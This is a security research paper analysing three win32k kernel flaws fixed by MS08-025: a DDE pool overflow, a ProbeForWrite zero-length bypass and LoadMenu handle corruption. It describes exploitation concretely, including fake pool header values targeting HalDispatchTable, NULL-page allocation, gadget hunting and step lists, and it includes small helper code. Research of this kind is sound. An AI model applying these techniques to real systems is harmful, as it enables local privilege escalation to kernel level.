NTSTATUS KeUserModeCallback (
    IN ULONG ApiNumber,
    IN PVOID InputBuffer,
    IN ULONG InputLength,
    OUT PVOID *OutputBuffer,
    IN PULONG OutputLength
    );
|
||||
|
||||
Microsoft did not provide a mechanism to retrieve arbitrary user-mode function
addresses from the kernel. Instead, the win32k driver has a set of functions
that it needs to call. This list is kept in an undocumented function table in
the Process Environment Block (PEB) structure of each process. The ApiNumber
argument is an index into this table.

In order to return to user-mode, KeUserModeCallback retrieves the user-mode
stack address from the saved user-mode context stored in the thread's
KTRAP_FRAME structure. It saves the current stack level and uses ProbeForWrite
to check that there is enough room for the input buffer. The InputBuffer
argument is then copied onto the user stack and an argument list is created
for the function being called. The KiCallUserMode function prepares the return
to user-mode by saving important information on the kernel stack. This
callback system works like a normal syscall exit procedure, except that the
stack level and the eip register have been changed. The callback starts in the
KiUserCallbackDispatcher function.

VOID KiUserCallbackDispatcher(
    IN ULONG ApiNumber,
    IN PVOID InputBuffer,
    IN ULONG InputLength
    );
|
||||
|
||||
The user-mode function KiUserCallbackDispatcher receives an argument list
which contains ApiNumber, InputBuffer, and InputLength. It dispatches to the
appropriate function using the PEB dispatch table. When it is finished, the
routine invokes interrupt 0x2B to transfer control back to kernel-mode. In
turn, the kernel inspects three registers:

- ecx: contains a user-mode pointer for OutputBuffer
- edx: contains OutputLength
- eax: contains the return status

The KiCallbackReturn kernel-mode function handles the 0x2B interrupt and
passes these registers as arguments to the NtCallbackReturn function. The
state is cleaned up using the information saved on the kernel stack, and
control returns to the KeUserModeCallback call that started the callback, with
its output arguments set accordingly.

The reader should notice that nothing is done to check the output data. Each
kernel function that uses the user-mode callback system is responsible for
verifying the output data. An attacker can simply hook the
KiUserCallbackDispatcher function and filter requests to control the output
pointer, size and data. This user-mode call can become a serious issue if its
results are not verified as rigorously as system call arguments.
|
||||
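As an illustration of the verification each caller is responsible for, the
following user-space sketch treats the reported output pointer and length as
untrusted. It checks the length and the address range, then copies the data
once so that later code works only on the captured copy. The boundary value,
the 12-byte reply size and all names are assumptions chosen for the example;
this is not win32k code.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

#define USER_PROBE_ADDRESS 0x7FFF0000u  /* assumed 32-bit user/kernel boundary */
#define EXPECTED_REPLY_LEN 12u          /* hypothetical fixed reply size */

typedef struct { uint32_t words[3]; } reply_t;

/* addr and len are the untrusted values reported by the callback. src is
 * where this simulation keeps the bytes that the address stands for. */
static bool capture_reply(uint32_t addr, uint32_t len,
                          const void *src, reply_t *out)
{
    assert(src != NULL && out != NULL);
    if (len != EXPECTED_REPLY_LEN) return false;          /* exact size only */
    if (addr >= USER_PROBE_ADDRESS) return false;         /* must start in user space */
    if (len > USER_PROBE_ADDRESS - addr) return false;    /* and must end there too */
    memcpy(out, src, sizeof *out);  /* copy once, then use only the copy */
    return true;
}
```

Any pointer or size found inside the captured reply is just as untrusted as
the outer pointer and needs the same treatment before it is used.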
|
||||
3) Discovery and exploitation

The win32k driver was patched by the MS08-025 bulletin[1]. This bulletin did
not disclose any details about the issues, but it did mention a vulnerability
that allows privilege elevation through invalid kernel checks. The patch
increases the overall security of the driver by adding multiple verifications.
In fact, it addresses three different reported vulnerabilities. The following
sections explain how these vulnerabilities were discovered and exploited.

3.1) DDE Kernel pool overflow

The Dynamic Data Exchange (DDE) protocol is a message system integrated into
the GUI. Although the Windows operating system already has many different
messaging mechanisms, this one shares data across processes by sharing GUI
handles and memory sections. This feature is quite old but is still supported
by Microsoft applications such as Internet Explorer, and it is used in
application firewall bypass techniques. During his research on the win32k
driver, the author investigated how the KeUserModeCallback function was used.
As described previously, this function does not directly verify output data.
This lack of validation is what leads to this vulnerability.
|
||||
|
||||
3.1.1) Vulnerability details

The vulnerability exists in the xxxClientCopyDDEIn1 win32k function. It is
not called directly but is used internally by the kernel when messages are
exchanged between processes using the DDE protocol. The listing below shows
how this function verifies the OutputBuffer returned by the callback.

In the xxxClientCopyDDEIn1 function:
|
||||
|
||||
    lea     eax, [ebp+OutputLength]
    push    eax
    lea     eax, [ebp+OutputBuffer]
    push    eax
    push    8                       ; InputLength
    lea     eax, [ebp+InputBuffer]
    push    eax
    push    32h                     ; ApiNumber
    call    ds:__imp__KeUserModeCallback@20
    mov     esi, eax                ; return < 0 (error ?)
    call    _EnterCrit@0
    cmp     esi, edi
    jl      loc_BF92C6D4

    cmp     [ebp+OutputLength], 0Ch ; Check output length
    jnz     loc_BF92C6D4

    mov     [ebp+ms_exc.disabled], edi ; = 0
    mov     edx, [ebp+OutputBuffer]
    mov     eax, _Win32UserProbeAddress
    cmp     edx, eax                ; Check OutputBuffer address
    jb      short loc_BF92C5DC

    [...]

loc_BF92C5DC:
    mov     ecx, [edx]
loc_BF92C5DE:
    mov     [ebp+var_func_return_value], ecx
    or      [ebp+ms_exc.disabled], 0FFFFFFFFh
    push    2
    pop     esi
    cmp     ecx, esi                ; first OutputBuffer ULONG must be 2
    jnz     loc_BF92C6D4
    xor     ebx, ebx
    inc     ebx
    mov     [ebp+ms_exc.disabled], ebx ; = 1
    mov     [ebp+ms_exc.disabled], esi ; = 2
    mov     ecx, [edx+8]            ; OutputBuffer - user mode ptr
    cmp     ecx, eax                ; Win32UserProbeAddress - check user mode ptr
    jnb     short loc_BF92C602

    [...]

loc_BF92C602:
    push    9
    pop     ecx
    mov     esi, eax
    lea     edi, [ebp+copy_output_data]
    rep movsd
    mov     [ebp+ms_exc.disabled], ebx ; = 1
    push    0
    push    'EdsU'
    mov     ebx, [ebp+copy_output_data.copy1_size] ; we control this
    mov     eax, [ebp+copy_output_data.copy2_size] ; and this
    lea     eax, [eax+ebx+24h]      ; integer overflow right here
    push    eax                     ; NumberOfBytes
    call    _HeavyAllocPool@12
    mov     [ebp+allocated_buffer], eax
    test    eax, eax
    jz      loc_BF92C6B6

    mov     ecx, [ebp+var_2C]
    mov     [ecx], eax              ; save allocation addr
    push    9
    pop     ecx
    lea     esi, [ebp+copy_output_data]
    mov     edi, eax
    rep movsd                       ; Copy output data
    test    ebx, ebx
    jz      short loc_BF92C65A

    mov     ecx, ebx
    mov     esi, [ebp+copy_output_data.copy1_ptr]
    lea     edi, [eax+24h]
    mov     edx, ecx
    shr     ecx, 2
    rep movsd                       ; copy copy1_ptr (with copy1_size)
    mov     ecx, edx
    and     ecx, 3
    rep movsb

loc_BF92C65A:
    mov     ecx, [ebp+copy_output_data.copy2_size]
    test    ecx, ecx
    jz      short loc_BF92C676
    mov     esi, [ebp+copy_output_data.copy2_ptr]
    lea     edi, [ebx+eax+24h]
    mov     edx, ecx
    shr     ecx, 2
    rep movsd                       ; copy copy2_ptr (with copy2_size)
    mov     ecx, edx
    and     ecx, 3
    rep movsb
|
||||
|
||||
The DDE copydata buffer contains two different buffers with their respective
sizes. These sizes are used to calculate the size of a buffer that is then
allocated. However, no check is made to detect whether an integer overflow
occurs. An integer overflow occurs when an arithmetic operation produces a
result beyond the maximum value an integer can hold; the result wraps around
and becomes a smaller integer. As such, the allocated buffer may be smaller
than either of the two buffer sizes, which leads to a kernel pool overflow.
The pool is the name given to the Windows kernel heap.
|
||||
|
||||
3.1.2) Pool overflow exploitation

Exploiting this issue is mostly a matter of knowing how to exploit a kernel
pool overflow. Previous work has described the kernel pool system and its
exploitation[8,9]. This paper will focus on exploiting the vulnerability being
described.

The kernel pool can be thought of as a heap. Memory is allocated by the
ExAllocatePoolWithTag function and then freed using the ExFreePoolWithTag
function. Depending on the memory size, a chunk header precedes the memory
data. Exploiting a pool overflow involves replacing the next chunk header with
a crafted version. This header is available through the ntoskrnl module
symbols as:

typedef struct _POOL_HEADER
{
    union
    {
        struct
        {
            USHORT PreviousSize : 9;
            USHORT PoolIndex : 7;
            USHORT BlockSize : 9;
            USHORT PoolType : 7;
        };
        ULONG32 Ulong1;
    };
    union
    {
        struct _EPROCESS* ProcessBilled;
        ULONG PoolTag;
        struct
        {
            USHORT AllocatorBackTraceIndex;
            USHORT PoolTagHash;
        };
    };
} POOL_HEADER, *PPOOL_HEADER; // sizeof(POOL_HEADER) == 8
|
||||
|
||||
Size fields are expressed in multiples of 8 bytes, as an allocated block is
always 8-byte aligned. The Windows 2000 pool architecture is different: memory
blocks are aligned on 16 bytes and the type flags are a simple UCHAR (no
bitfields). The PoolIndex field is not important for our overflow and can be
set to 0. The PoolType field contains the chunk state with multiple possible
flags. The busy flag changes between operating system versions, but a free
chunk always has its PoolType field set to zero.

During a pool overflow, the next chunk header is overwritten with malicious
values. When the allocated block is freed, the ExFreePoolWithTag function
looks at the type of the next block. If the next block is free, it is
coalesced by unlinking it and merging it with the current block. The
LIST_ENTRY structure links free blocks together and immediately follows the
POOL_HEADER structure when a chunk is free. The unlinking procedure is exactly
the same as that of the user-mode heap, except that no safe unlinking check is
done. This procedure is repeated for the previous block. Many papers have
already explained unlinking exploitation, which allows writing 4 bytes to a
controlled address. However, this attack breaks the pool's internal linked
list and exploitation must take this into consideration. As such, it is
necessary to restore the pool's list integrity to prevent the system from
crashing.
|
||||
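The write primitive behind unlinking can be shown on an ordinary doubly linked
list in user space. In the sketch below, the structure and function names are
invented for the example, and the checked variant only illustrates what a
"safe unlinking" test looks like in general. Neither function is taken from
the Windows kernel.

```c
#include <assert.h>
#include <stddef.h>

typedef struct list_entry {
    struct list_entry *flink;   /* forward link */
    struct list_entry *blink;   /* backward link */
} list_entry_t;

/* Classic unlink without any consistency check. */
static void unsafe_unlink(list_entry_t *entry)
{
    assert(entry != NULL);
    list_entry_t *next = entry->flink;
    list_entry_t *prev = entry->blink;
    prev->flink = next;   /* *(Blink) = Flink: the controlled write          */
    next->blink = prev;   /* *(Flink + 4) = Blink on 32-bit x86: side effect */
}

/* Safe-unlink style variant: both neighbours must point back at the entry.
 * Returns 1 when the entry was unlinked and 0 when it was rejected. */
static int checked_unlink(list_entry_t *entry)
{
    assert(entry != NULL);
    if (entry->flink->blink != entry || entry->blink->flink != entry)
        return 0;
    unsafe_unlink(entry);
    return 1;
}
```

If both links of an entry are forged, the first store places the Flink value
at the address given by Blink, and the second store modifies the memory that
follows the Flink address. This is why both locations must be writable and
why the list has to be repaired afterwards.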
|
||||
There are a number of different addresses that may be overwritten, such as
directly modifying code or overwriting the contents of a function pointer. In
local kernel exploitation, the target address should be one that is rarely
used by the kernel, to prevent operating system instability. In his paper,
Ruben Santamarta used a function pointer accessible through an exported kernel
variable named HalDispatchTable[10]. This function pointer is used by
KeQueryIntervalProfile, which is called by the system call
NtQueryIntervalProfile. Overwriting the function pointer at HalDispatchTable+4
does not break system behavior, as this function is unsupported in the default
configuration. A clean privilege escalation code should consider restoring the
overwritten data. For our exploitation, this is the best choice as it is easy
to launch and target.

The exploitation code for this particular vulnerability should produce this
fake chunk:

Fake next pool chunk header for Windows XP / 2003:

PreviousSize = (copy1_size + sizeof(POOL_HEADER)) / 8
PoolIndex    = 0
BlockSize    = (sizeof(POOL_HEADER) + 8) / 8
PoolType     = 0 // Free chunk

Flink = Execute address - 4  // in userland - call +4 address
Blink = HalDispatchTable + 4 // in kernelland

Modification for Windows 2000 support:

PreviousSize = (copy1_size + sizeof(POOL_HEADER)) / 16
BlockSize    = (sizeof(POOL_HEADER) + 15) / 16

The Flink field points to a user-mode address, minus 4, which will be called
from the kernel address space once the function pointer designated by Blink
has been replaced. When called by the kernel, the user-mode code executes at
ring0 and is able to modify operating system behavior.
|
||||
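To make the field arithmetic concrete, the following sketch packs the four
bitfields of the first header dword (9 + 7 + 9 + 7 bits) and computes the
Windows XP / 2003 values listed above for a given copy1_size. The helper
names are invented for the example, and the bit positions assume the
low-bit-first bitfield layout of 32-bit x86 compilers.

```c
#include <assert.h>
#include <stdint.h>

#define POOL_HEADER_SIZE 8u   /* sizeof(POOL_HEADER) on 32-bit XP / 2003 */
#define POOL_GRANULARITY 8u   /* size fields count 8-byte units */

/* Pack PreviousSize, PoolIndex, BlockSize and PoolType into the Ulong1 view. */
static uint32_t pack_pool_header(uint32_t previous_size, uint32_t pool_index,
                                 uint32_t block_size, uint32_t pool_type)
{
    assert(previous_size < 512u && block_size < 512u);  /* 9-bit fields */
    assert(pool_index < 128u && pool_type < 128u);      /* 7-bit fields */
    return previous_size | (pool_index << 9) |
           (block_size << 16) | (pool_type << 25);
}

/* First dword of the fake free chunk header described in the text. */
static uint32_t fake_free_header(uint32_t copy1_size)
{
    uint32_t previous_size = (copy1_size + POOL_HEADER_SIZE) / POOL_GRANULARITY;
    uint32_t block_size = (POOL_HEADER_SIZE + 8u) / POOL_GRANULARITY;
    return pack_pool_header(previous_size, 0u, block_size, 0u);
}
```

For copy1_size = 0x18 this gives PreviousSize = 4 and BlockSize = 2, that is
a first dword of 0x00020004.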
|
||||
In this specific vulnerability, to avoid a crash and to control the data
copied into the target memory buffer, copy2_ptr should point to a NOACCESS
memory page. When the copy occurs, an exception is raised, which is caught by
a try/except block in the function. The exception handler frees the allocated
buffers. The size of the copied memory is controlled by the copy1_size field
and the integer overflow is triggered by the copy2_size field. This
configuration makes it possible to overflow only the necessary part.
|
||||
|
||||
3.1.3) Delayed free pool overflow on Windows Vista

The allocation pool type in win32k on Windows Vista uses an undocumented
DELAY_FREE flag. With this flag, the ExFreePoolWithTag function does not free
a memory block immediately but instead pushes it onto a deferred free list. If
the kernel needs more memory or the deferred free list is full, it pops an
entry off the list and frees it through the normal means. This can cause
problems because the actual free may not occur until many minutes later, in a
potentially different process context. Due to this problem, both the Flink and
Blink pointers must be in the kernel-mode address space.

The HalDispatchTable overwrite technique can be reused to support this
configuration. The disassembly of the KeQueryIntervalProfile function shows
how the function pointer is used. This context is always the same across
Windows versions.

    mov     [ebp+var_C], eax
    lea     eax, [ebp+arg_0]
    push    eax
    lea     eax, [ebp+var_C]
    push    eax
    push    0Ch
    push    1
    call    off_47503C      ; xHalQuerySystemInformation(x,x,x,x)
|
||||
|
||||
The first and second arguments point into user-mode, in the NULL page. This
page can be allocated using the NtAllocateVirtualMemory function with an
unaligned address inside the NULL page. The kernel function realigns this
pointer to the lower page boundary and allocates the page. This page is also
used in kernel NULL dereference vulnerabilities. In order to exploit this
context, a stub of machine code must be found which returns to the first
argument and whose next 4 bytes can be overwritten. This is the case for
function epilogues, such as that of the wcslen function:

.text:00463B4C    sub     eax, [ebp+arg_0]
.text:00463B4F    sar     eax, 1
.text:00463B51    dec     eax
.text:00463B52    pop     ebp
.text:00463B53    retn
.text:00463B54    db 0CCh ; alignment padding
.text:00463B55    db 0CCh
.text:00463B56    db 0CCh
.text:00463B57    db 0CCh
.text:00463B58    db 0CCh

In this example, the 00463B51h address fits our needs. The pop instruction
pops the return address and the retn instruction then returns to address 1,
the first argument. The alert reader will have noticed that the selected
address starts at the dec instruction. The unlinking procedure overwrites the
next 4 bytes, and there are 5 padding bytes starting at address 00463B54h.
Without this padding, overwriting unknown assembly could lead to a crash,
compromising the exploitation. The location of this target address changes
depending on the operating system version, but this type of context can be
found using pattern matching. On Windows Vista, the exploit loops calling the
NtQueryIntervalProfile function until the deferred free occurs and
exploitation is successful. This loop is mandatory as the pool's internal
structure must be corrected.
|
||||
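The pattern matching mentioned above can be as simple as a byte search. The
sketch below looks for the 32-bit x86 encoding of the epilogue shown in the
listing (dec eax = 48h, pop ebp = 5Dh, retn = C3h) followed by five 0CCh
padding bytes, inside a buffer that the caller has already filled with the
image bytes. The function name and the exact pattern length are assumptions
made for the example.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* dec eax; pop ebp; retn; then five int3 (0CCh) padding bytes. */
static const uint8_t k_stub[] = {
    0x48, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC
};

/* Returns the offset of the first match in image[0..size), or -1 if none. */
static ptrdiff_t find_stub(const uint8_t *image, size_t size)
{
    assert(image != NULL);
    if (size < sizeof k_stub) return -1;
    for (size_t i = 0; i + sizeof k_stub <= size; i++) {
        if (memcmp(image + i, k_stub, sizeof k_stub) == 0)
            return (ptrdiff_t)i;
    }
    return -1;
}
```

The returned value is an offset inside the scanned buffer, so it still has to
be translated to the address at which the module is loaded.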
|
||||
3.2) NtUserfnOUTSTRING kernel overwrite vulnerability

The NtUserfnOUTSTRING function is accessible through an internal table used by
the NtUserMessageCall exported function. Functions whose names start with
"NtUserfn" can be called with the SendMessage function exported by the
user32.dll module. For this function, the WM_GETTEXT window message is
necessary. Notice that in some cases a direct call is needed for successful
exploitation. The verifications made by the SendMessage function are trivial,
as it is used for different functions, but they should be taken into account.
The MSDN website describes the use of SendMessage.
|
||||
|
||||
3.2.1) Evading ProbeForWrite function

The ProbeForWrite function verifies that an address range resides in the
user-mode address space and is writable. If not, it raises an exception that
can be caught by a try / except code block. This function is used a lot by
drivers which deal with user-mode inputs. The following is the start of the
ProbeForWrite function assembly:

void __stdcall ProbeForWrite(PVOID Address, SIZE_T Length, ULONG Alignment)

    mov     edi, edi
    push    ebp
    mov     ebp, esp
    mov     eax, [ebp+Length]
    test    eax, eax
    jz      short loc_exit  ; Length == 0

    [...]

loc_exit:
    pop     ebp
    retn    0Ch

This short assembly dump underlines one way to evade the ProbeForWrite
function. If the Length argument is zero, no verification is done on the
Address argument. It means that Microsoft considers that a zero-length input
does not require the address to point into userland. Microsoft made a blog
post on MS08-025[12] explaining why ProbeForWrite was not modified as
expected. Microsoft's compatibility concern is understandable, but at least
the ProbeForWrite documentation should be updated for this case.
|
||||
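The behavior can be modeled in a few lines of portable C. The sketch below
reproduces only the range logic suggested by the disassembly: it returns
false where the real routine would raise an exception, it does not model
writability, and the boundary constant and both function names are
assumptions made for the example.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define USER_PROBE_ADDRESS 0x7FFF0000u  /* assumed 32-bit user/kernel boundary */

/* Simplified model of the probe: a zero length skips every other check. */
static bool probe_range(uint32_t address, uint32_t length, uint32_t alignment)
{
    assert(alignment == 1u || alignment == 2u ||
           alignment == 4u || alignment == 8u);
    if (length == 0u) return true;            /* early exit, address never examined */
    if ((address & (alignment - 1u)) != 0u) return false;
    uint32_t end = address + length;          /* may wrap around */
    if (end < address) return false;
    return end <= USER_PROBE_ADDRESS;
}

/* Stricter variant for callers that write through the pointer in any case. */
static bool probe_range_strict(uint32_t address, uint32_t length,
                               uint32_t alignment)
{
    if (address >= USER_PROBE_ADDRESS) return false;
    return probe_range(address, length, alignment);
}
```

With a kernel address and a length of zero, probe_range accepts the request
while probe_range_strict rejects it. A caller that writes even a single
terminating byte after a zero-length probe is therefore unprotected.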
|
||||
3.2.2) Vulnerability details

This vulnerability affects not only this function but a whole class of string
management functions. Some functions make sure that the length argument is not
zero before modifying it. Others do not even check the length argument. A
proof of concept for this vulnerability has been published by Ruben
Santamarta[11].

The NtUserfnOUTSTRING function vulnerability evades the ProbeForWrite function
and overwrites 1 or 2 bytes of kernel memory. The disassembly of this function
is below:

In NtUserfnOUTSTRING (WM_GETTEXT)

    xor     ebx, ebx
    inc     ebx
    push    ebx                     ; Alignment = 1
    and     eax, ecx                ; eax = our size | ecx = 0x7FFFFFFF
    push    eax                     ; If our size is 0x80000000 then
                                    ; Length is zero (avoid any check)
    push    esi                     ; Our kernel address
    call    ds:__imp__ProbeForWrite@12
    or      [ebp+var_4], 0FFFFFFFFh
    mov     eax, [ebp+arg_14]
    add     eax, 6
    and     eax, 1Fh
    push    [ebp+arg_10]
    lea     ecx, [ebp+var_24]
    push    ecx
    push    [ebp+arg_8]
    push    [ebp+arg_4]
    push    [ebp+arg_0]
    mov     ecx, _gpsi
    call    dword ptr [ecx+eax*4+0Ch] ; Call appropriate sub function
    mov     edi, eax
    test    edi, edi
    jz      loc_BF86A623            ; Something goes wrong

    [...]

loc_BF86A623:
    cmp     [ebp+arg_8], eax        ; Submit size was 0 ? (no)
    jz      loc_BF86A6D1

    [...]

    push    [ebp+arg_18]            ; Wide or Multibyte mode
    push    esi                     ; Our address
    call    _NullTerminateString@8  ; <== 0 byte or short overwriting

In this function, a high size (0x80000000) bypasses the ProbeForWrite
verification. After this verification, the function calls a routine taken from
a win32k internal function pointer table. Which routine is called depends on
the calling context. If the call is made from the thread that owns the
submitted handle, it goes directly to the retrieval function; otherwise the
request can be held by another function that waits for the owning thread to
handle it. This assembly sample highlights the null byte overwrite that
happens if the other functions fail. The null byte ensures that a valid string
is returned. This is not the only way to overwrite memory. By using an edit
box, we could overwrite kernel memory with a custom string, but the first way
fits the need.
|
||||
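The effect of the mask is easy to check by hand. The sketch below computes
the length that reaches the probe after the `and eax, ecx` instruction and
shows one possible hardening, which rejects any size that the mask would
change. The names are invented for the example, and the hardening is an
assumption of this sketch, not a description of the actual patch.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define LENGTH_MASK 0x7FFFFFFFu  /* the ecx value in the listing */

/* Length that reaches the probe after `and eax, ecx`. */
static uint32_t probed_length(uint32_t requested_size)
{
    return requested_size & LENGTH_MASK;
}

/* Hypothetical hardening: refuse sizes that the mask would silently alter. */
static bool size_survives_mask(uint32_t requested_size)
{
    uint32_t masked = probed_length(requested_size);
    assert(masked <= LENGTH_MASK);
    return masked == requested_size;
}
```

A requested size of 0x80000000 is not zero, so the later "was the size 0?"
test lets it through, yet the probe sees a length of 0 and checks nothing.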
|
||||
The exploitation is trivial and will not be detailed here. The section on the
first vulnerability already presented a target address and a way to allocate
the NULL page; both were used to demonstrate this vulnerability.
|
||||
|
||||
3.3) LoadMenu handle table corruption

The win32k driver implements its own handle mechanism. This system shares a
handle table between user-mode and kernel-mode. This table is mapped into the
user-mode address space as read-only and is modified from the kernel-mode
address space. The MS07-017 bulletin, covering an issue found by Cesar Cerrudo
during the Month of Kernel Bugs (MOKB)[13], describes this table and how its
modification could permit kernel code execution. This chapter addresses
another vulnerability based on the misuse of a GDI shared handle table entry.
|
||||
|
||||
3.3.1) Handle table

In the GUI architecture, a handle contains different pieces of information,
such as an index into the shared handle table and the object type. The handle
table is an array of the undocumented HANDLE_TABLE_ENTRY structure.

typedef struct _HANDLE_TABLE_ENTRY
{
    union
    {
        PVOID pKernelObject;
        ULONG NextFreeEntryIndex; // Used on free state
    };
    WORD ProcessID;
    WORD nCount;
    WORD nHandleUpper;
    BYTE nType;
    BYTE nFlag;
    PVOID pUserInfo;
} HANDLE_TABLE_ENTRY; // sizeof(HANDLE_TABLE_ENTRY) == 12

The nType field defines the table entry type. A free entry has a type of zero,
and its nFlag field indicates whether it has been destroyed or is currently
being destroyed. Normal handle verification routines check this value before
reading the pKernelObject field, which points to the associated kernel object.
In a free entry, the NextFreeEntryIndex field contains the index of the next
free entry, which is not a pointer but a simple unsigned long value.

The GUI object structure depends on the object type but always starts with the
same header, which contains the corresponding index in the shared handle
table. The architecture relies on both elements: it switches between the table
entry and the kernel object depending on its needs. A security issue exists if
the handle table is not used as it should be.
|
||||
|
||||
3.3.2) Vulnerability details

The vulnerability itself exists in win32k's xxxClientLoadMenu function, which
does not correctly validate a handle index. This function is called by the
GetSystemMenu function and calls back into user-mode using the
KeUserModeCallback function to retrieve a handle index. The following assembly
shows how this value is used.

    and     eax, 0FFFFh         ; eax is controlled
    lea     eax, [eax+eax*2]    ; index * 3
    mov     ecx, gSharedTable
    mov     edi, [ecx+eax*4]    ; base + (index * 12)

This assembly sample uses an unchecked handle index and returns the
pKernelObject field of the target entry. This pointer is returned by the
xxxClientLoadMenu function. Proper verifications are not made, which permits
the manipulation of a deleted handle. A deleted handle has its
NextFreeEntryIndex field set to a value between 0x1 and 0x3FFF, so the
returned value will point into the first memory pages.
|
||||
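The lookup performed by these four instructions, and the check it lacks, can
be sketched as follows. The entry layout is a simplified 12-byte stand-in
that names only the fields needed here, and the function names and the table
size parameter are assumptions made for the example. It is not the real
win32k structure.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Simplified 12-byte entry, matching the index * 12 stride of the listing. */
typedef struct {
    uint32_t object_or_next_free;  /* pKernelObject, or NextFreeEntryIndex when free */
    uint8_t  reserved[6];
    uint8_t  type;                 /* nType: 0 means the entry is free */
    uint8_t  flag;                 /* nFlag */
} handle_entry_t;

/* Mirrors the listing: mask the index, read the first field unconditionally. */
static uint32_t lookup_unchecked(const handle_entry_t *table, uint32_t handle)
{
    assert(table != NULL);
    return table[handle & 0xFFFFu].object_or_next_free;
}

/* Checked variant: bounds-check the index and refuse free entries.
 * Returns 0 when the handle is rejected. */
static uint32_t lookup_checked(const handle_entry_t *table, size_t count,
                               uint32_t handle)
{
    assert(table != NULL);
    uint32_t index = handle & 0xFFFFu;
    if (index >= count) return 0;
    if (table[index].type == 0) return 0;
    return table[index].object_or_next_free;
}
```

For a free entry, the unchecked lookup returns the next free index as if it
were an object pointer, which is how a small value such as 0x3 ends up being
treated as an address in the first memory pages.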
|
||||
A system menu is linked to a window object. This window object is designated
by a handle passed as an argument to the GetSystemMenu function. The spmenuSys
field of the window object is set to the value returned by the
xxxClientLoadMenu function. In this specific context, the spmenuSys value
points to a hardly predictable location inside the NULL page. During thread
exit, the window cleanup looks at the spmenuSys object and, using its index in
the shared table, sets the nFlag field to destroyed and nType to free. If the
NULL page is filled with zeros, this destroys the first entry of the GDI
shared handle table.

Exploitation is achieved by reusing the vulnerable function once the first
entry has been destroyed. The GetSystemMenu function locks and unlocks the GDI
shared handle table entry linked with the kernel object returned by the
xxxClientLoadMenu function. If the entry is flagged as destroyed, the unlock
function calls the destroy callback of its type. For the first entry, the flag
has been set to destroyed. There is no callback for this type, as it is not
supposed to be unlocked. The unlock function therefore calls address zero,
which allows kernel code execution. This specific handle management
architecture remains undocumented. Having a destruction callback inside the
thread unlocking procedure is unusual.

Exploitation steps:

1. Allocate the NULL address
2. Exploitation loop - the second iteration triggers the call to zero:
a. Create a dialog
b. Set NULL page data to zero
c. Set a relative jmp at address zero
d. Create a menu graphic handle (or another type)
e. Destroy this menu handle
f. Call GetSystemMenu
g. Intercept the user callback and return the destroyed menu handle index
   (mask 0x3fff of the handle)
h. Exit this thread - sets the zero handle entry as free and destroyed

There are multiple ways to exploit this vulnerability. The author truly
believes that exploiting the locking procedure could be used for handle leak
vulnerabilities, as it was for this one. Admittedly, the exploitation of this
vulnerability remains complex and unusual. This specific context made
exploitation even more interesting.
|
||||
|
||||
4) GUI architecture protection

Creating safe software is a hard task, definitely harder than finding
vulnerabilities. This work is even harder when it concerns old components
which must respect compatibility rules. This article does not blame Microsoft
for those vulnerabilities; it presents global issues in the Windows
architecture. With Windows Vista, Microsoft started securing its operating
system environment. The Windows Vista code base is definitely safer than it
was. Some kernel components, such as the win32k driver, are not safe enough
and should be considered a priority in local operating system security.

The GUI architecture does not respect security basics. Starting from scratch
would certainly be a good option if it were possible. The global organization
of this driver makes security audits a mess. On the other hand, the Windows
API shows that it meets developer needs. There is a big abstraction layer
between the userland API and the kernel functions. It can be used to rebuild
the win32k driver without breaking compatibility. The API must follow user
needs and be as easy to use as it can be. There is no reason why the functions
exported by the kernel driver could not be changed in a secure way. It
represents an enormous amount of work which could only be achieved across
operating system versions. Nevertheless, it is necessary. This modification
could also increase performance by reducing unneeded context switching. There
is no good reason to go into the kernel to ask userland for a value that will
be returned to userland. The user-mode callback system does not fit in a
consistent GUI architecture.

Local exploitation techniques also highlight insecure components such as the
kernel pool, and how overwriting some function pointers allows kernel code
execution. In the past, userland has been hardened because exploitation was
too easy and third-party software could allow a computer to be compromised.
Kernel performance is critical, and adding verification routines and security
measures could break this advantage. The solution should lie in an operating
system evolution which does not restrict the user experience. Hardware
improvements do not excuse the fact that a modern operating system requires
more resources than before.

Software development follows the fastest way except when a specific result is
expected. A company does not look for the best way but for something that
costs less for almost the same result. Microsoft did not choose the easy path
by starting the Security Development Lifecycle (SDL)[14] and should continue
in this way.
|
||||
|
||||
5) Conclusion
|
||||
|
||||
The Windows kernel components have unequal security verification level. The
|
||||
main kernel module (ntoskrnl.exe) respects a standard verification dealing
|
||||
with userland data. The win32k driver does not follow the same rules which
|
||||
creates messy verification algorithms. This driver has an important
|
||||
interaction with userland by different mechanism from usual syscall to
|
||||
userland callback system. This architecture increase attack surface. The
|
||||
vulnerable parts do not concern usual vulnerabilities but also internal
|
||||
mechanism as GUI handle system.
|
||||
|
||||
Chapter exposed vulnerabilities discovery and exploitation. Local
|
||||
exploitation has many different attack vectors. Nowadays, the exploitation is
|
||||
fast and sure, it works at any attempts. The kernel exploitation is possible
|
||||
though different techniques.
|
||||
|
||||
The win32k driver was not built with a secure design, and it has now become so
huge, with so many compatibility constraints, that every release just
implements new features without changing anything else. Windows Vista
introduces many modifications, but most of them are just automatic integer
overflow checks. These will resolve many unknown issues, but the interaction
between user mode and kernel mode remains hard to predict. Vulnerabilities are
not always a matter of proper checks; they also arise from system interaction
and custom context.
|
||||
|
||||
Implementing the usual userland protections is not a good solution, as kernel
exploitation goes beyond overflows. The win32k driver could change by using a
userland abstraction layer in order to keep compatibility. This is not the
easiest choice, as it demands more time and work. The patch discussed in this
paper improves win32k security slightly, as it goes deeper than the reported
vulnerabilities. However, the Windows Vista version of the win32k driver was
affected by two vulnerabilities even though it was already more secure. Minor
modifications do not solve security issues. Overall kernel security has been
discussed in various papers about vulnerabilities and also rootkits. Everyone
agrees that operating systems must evolve. Windows Seven could introduce a new
privilege architecture that secures critical components, or just improve win32k
driver security.
|
||||
|
||||
References
|
||||
|
||||
[1] Microsoft Corporation. Microsoft Security Bulletin MS08-025
|
||||
http://www.microsoft.com/technet/security/Bulletin/MS08-025.mspx
|
||||
|
||||
[2] Microsoft Corporation. Windows User Interface.
|
||||
http://msdn.microsoft.com/en-us/library/ms632587(VS.85).aspx
|
||||
|
||||
[3] Microsoft Corporation. SendMessage function.
|
||||
http://msdn.microsoft.com/en-us/library/ms644950.aspx
|
||||
|
||||
